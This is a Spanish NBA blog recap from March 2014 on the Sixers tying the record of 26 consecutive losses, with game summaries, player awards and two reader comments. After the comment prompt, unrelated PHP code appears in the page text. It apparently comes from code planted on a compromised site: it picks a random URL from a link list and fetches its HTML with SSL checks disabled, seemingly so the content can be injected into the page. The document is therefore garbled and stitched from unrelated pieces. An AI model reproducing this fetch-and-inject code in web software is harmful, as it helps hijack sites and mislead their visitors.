La Crónica: 26

28 de March de 2014 por txusma

Lo consiguieron. Los Sixers ya empezaron la temporada con el objetivo de ser el peor equipo de la NBA y en febrero refrendaron sus ganas de pasar a la historia acabando de desmantelar el equipo con los traspasos de Turner y Hawes. ¿Resultado? 26 derrotas consecutivas que los convierten en el equipo que más ha acumulado empatado con los Cavs de la 2010/2011. Poca gente espera que no superen el récord el próximo sábado ante los Pistons y pocos dudan de que no lleguen a la treintena. Felicidades. Si existiera la justicia divina escogerían en 4ª posición en el draft de 2014.

Casi no vale la pena explicar su partido de ayer. Los Rockets se pusieron las botas ante la inexistente defensa de los Sixers y James Harden consiguió el 2º triple-doble de su carrera. No debería contar lo mismo pero quedará para las estadísticas (98-120). El Lakers – Bucks también fue un partido infame protagonizado por muchos jugadores que seguramente no encontrarían sitio en otras franquicias de la NBA (a excepción de los Sixers, claro). ¿Kendall Marshall? ¿Jeff Adrien? ¿Wesley Johnson? Vaya titulares… Ganaron los Bucks, como podían haber ganado los Lakers, que la verdad nos da bastante lo mismo (105-108).

Por suerte, en los otros 2 partidos sí que había cosas importantes en juego. En Atlanta se encontraban dos franquicias que pasan por un mal momento y fueron los locales los que se hundieron más en la miseria. Volvió Lamarcus Aldridge y a Paul Millsap y los Hawks se le encogió el alma. Al término de la 1ª parte ya estaba todo decidido y en ningún momento Atlanta dio la sensación de poder ir a por el partido (100-85). La victoria da algo de aire a los Blazers y deja a los Hawks sólo una victoria por encima de los Knicks y 2 por encima de los Cavs. Ver para creer. Otros que lo van a pasar mal son los Mavs, que ayer cayeron ante los Clippers a pesar de llegar a ganar de 10 puntos durante el último cuarto. Monta Ellis jugó un pésimo partido y a Dirk Nowizki se le encogió la mano justo cuando no se podía fallar, muy bien defendido por Blake Griffin (109-103). Con la derrota, Dallas se confirma en la novena posición de la conferencia y empieza a pensar que a lo mejor los Suns aguantan y que son ellos los que se quedan fuera. Y entonces miran la clasificación de la otra conferencia y les llevan los demonios… 

PREMIOS

MVP: Chris Paul saltó a la pista del American Airlines Center de Dallas con ganas de demostrar que el 0 de 12 del día anterior había sido un accidente. Los Mavs sufrieron su motivación extra y cayeron con 31 puntos, 4 rebotes y 9 asistencias del base de los Clippers. James Harden abusó de los Sixers y consiguió el 2º triple-doble de su carrera con 26 puntos, 10 reboets y 10 asistencias.

Sorpresa: Jae Crowder ejerció de Marion (totalmente desaparecido) y consiguió 13 puntos, 4 rebotes y 2 robos en apenas 19 minutos de partido.

Decepción: No está pasando por un buen momento Paul Millsap. La vuelta de Lamarcus Aldridge le debió de intimidar y sólo fue capaz de anotar 10 puntos con un 3 de 15 en TC.

Esfuerzo en vano: Jordan Hill fue el único que mostró algo en de sangre de entre los jugadores de los Lakers. Acabó el partido con 28 puntos y 16 rebotes pero prácticamente ningú otro compañero estuvo a la altura.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Cuantos pasos da Griffin para soltar el alley-oop? XDDDDD

    El caderazo de Howard a Young no cuenta como falta? aunque es un buen tapón, de eso no hay duda

      Citar

  2. Jose Luis dice:
    #2

    What a move by Hill!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>